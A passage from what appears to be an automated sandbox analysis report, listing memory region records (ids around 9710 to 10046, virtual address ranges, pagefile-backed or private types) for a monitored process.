9710 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9711 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9712 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9713 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9714 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9715 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9725 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9726 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9727 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 9728 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9732 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9733 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9734 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 9735 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9738 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9740 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9741 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 9742 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9743 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9744 start_va = 0xbd70000 end_va = 0xc261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bd70000" filename = "" Region: id = 9745 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9746 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 9747 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9748 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9749 start_va = 0x590000 end_va = 0x592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 9750 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9751 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9752 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9753 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9754 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9755 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9756 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9757 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9758 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9759 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9760 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9761 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9762 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9763 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9764 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9765 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9766 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9767 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9768 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9771 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9772 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9773 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9774 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9776 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9777 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9778 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9779 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9780 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9781 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9782 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9783 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9787 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9788 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9789 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9790 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9794 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9795 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9796 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9797 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9806 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9809 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9810 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9811 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9820 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9821 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9822 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9823 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9830 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9831 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9836 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9837 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9843 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9844 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9845 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9846 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9856 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9857 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9858 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9859 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9860 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9861 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9862 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9863 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9864 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9865 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9866 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9867 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9878 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9879 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9880 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9881 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9887 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9888 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9889 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9890 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9897 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9898 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9899 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9900 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9906 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9907 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9908 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9909 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9911 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9912 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9913 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9914 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9915 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9916 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9917 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9918 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9921 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9922 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9923 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 9925 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9929 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9930 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9931 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 9932 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9934 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9935 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 9936 start_va = 0x26c0000 end_va = 0x26e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 9937 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9938 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9939 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9942 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9943 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9944 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9945 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9951 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9952 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9953 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9954 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9960 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9961 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9962 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9964 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9968 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9969 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9970 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9971 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9978 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9979 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9980 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9981 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9990 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9992 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 9993 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9994 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 9999 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10000 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10001 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10002 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10004 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10005 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10006 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10007 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10010 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10011 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10012 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10013 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10014 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10015 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10016 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10017 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10018 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10019 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10020 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10021 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10022 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10023 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10024 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10025 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10026 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10027 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10028 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10029 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10030 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10031 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10032 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10033 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10034 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10035 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10036 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10037 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10038 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10039 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10040 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10041 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10042 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10043 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 10044 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10045 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10046 start_va = 0x580000 end_va = 0x58ffff monitored = 1 